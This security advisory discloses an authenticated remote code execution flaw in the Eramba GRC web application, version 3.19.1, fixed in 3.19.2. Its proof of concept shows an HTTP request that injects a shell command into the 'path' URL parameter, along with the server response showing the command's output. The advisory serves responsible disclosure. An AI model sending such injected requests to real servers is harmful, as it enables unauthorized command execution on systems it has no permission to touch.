# Trovent Security Advisory 2303-01 # ##################################### Authenticated remote code execution in Eramba ############################################# Overview ######## Advisory ID: TRSA-2303-01 Advisory version: 1.0 Advisory status: Public Advisory URL: https://trovent.io/security-advisory-2303-01 Affected product: Eramba Affected version: 3.19.1 (Enterprise and Community edition) Vendor: Eramba Limited, https://www.eramba.org Credits: Trovent Security GmbH, Sergey Makarov Detailed description #################### Eramba is a web application for managing Governance, Risk, and Compliance (GRC). Trovent Security GmbH discovered that the Eramba web application allows remote code execution for authenticated users. A possible attacker is able to modify the parameter "path" in the URL "https://hostname/settings/download-test-pdf?path=" to execute arbitrary commands in the context of the user account the application is running in. To see the output of the executed command in the HTTP response, debug mode has to be enabled. Severity: High CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) CVE ID: CVE-2023-36255 CWE ID: CWE-94 Proof of concept ################ HTTP request: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1 Host: [redacted] Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://[redacted]/settings Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP response: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HTTP/1.1 500 Internal Server Error Date: Fri, 31 Mar 2023 12:37:55 GMT Server: Apache/2.4.41 (Ubuntu) Access-Control-Allow-Origin: * Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Disposition: attachment; filename="test.pdf" X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2033469 <!DOCTYPE html> <html> <head> <meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> Error: The exit status code &#039;127&#039; says something went wrong: stderr: &quot;sh: 1: --dpi: not found &quot; stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether [redacted] brd ff:ff:ff:ff:ff:ff inet [redacted] brd [redacted] scope global ens33 valid_lft forever preferred_lft forever inet6 [redacted] scope link valid_lft forever preferred_lft forever &quot; command: ip a; --dpi &#039;90&#039; --lowquality --margin-bottom &#039;0&#039; --margin-left &#039;0&#039; --margin-right &#039;0&#039; --margin-top &#039;0&#039; --orientation &#039;Landscape&#039; --javascript-delay &#039;1000&#039; &#039;/tmp/knp_snappy6426d4231040e1.91046751.html&#039; &#039;/tmp/knp_snappy6426d423104587.46971034.pdf&#039;. </title> [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution / Workaround ##################### The vendor released a fixed version of Eramba. Fixed in version 3.19.2. History ####### 2023-03-31: Vulnerability found 2023-04-04: Vendor contacted 2023-04-17: Vendor confirmed vulnerability 2023-04-20: Vendor released fixed version 2023-05-25: Trovent verified remediation of the vulnerability 2023-06-13: CVE ID requested 2023-07-28: CVE ID received 2023-08-01: Advisory published